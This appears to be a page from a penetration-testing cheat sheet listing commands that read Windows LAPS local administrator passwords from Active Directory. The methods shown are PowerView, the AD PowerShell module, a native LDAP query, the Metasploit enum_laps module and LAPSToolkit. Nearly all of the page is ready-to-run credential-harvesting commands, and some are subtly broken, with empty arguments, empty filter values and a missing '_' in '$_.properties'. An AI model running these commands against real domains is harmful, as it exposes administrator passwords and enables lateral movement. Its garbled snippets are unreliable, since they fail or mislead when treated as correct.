Laps Password Read
Reading laps password with various methods

Powerview
Get-NetComputer | Select-Object 'name','ms-mcs-admpwd' Get-DomainComputer -identity -properties ms-Mcs-AdmPwd
PowerShell
Get-ADComputer -Filter * -Properties 'ms-Mcs-AdmPwd' | Where-Object { $_.'ms-Mcs-AdmPwd' -ne $null } | Select-Object 'Name','ms-Mcs-AdmPwd'
Native
([adsisearcher]"(&(objectCategory=computer)(ms-MCS-AdmPwd=)(sAMAccountName=))").findAll() | ForEach-Object { Write-Host "" ; $.properties.cn ; $.properties.'ms-mcs-admpwd'}
Metasploit
use post/windows/gather/credentials/enum_laps
LAPSToolkit
$pass = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("<USERNAME>", $pass)
Get-LAPSComputers -Credential $cred
Last updated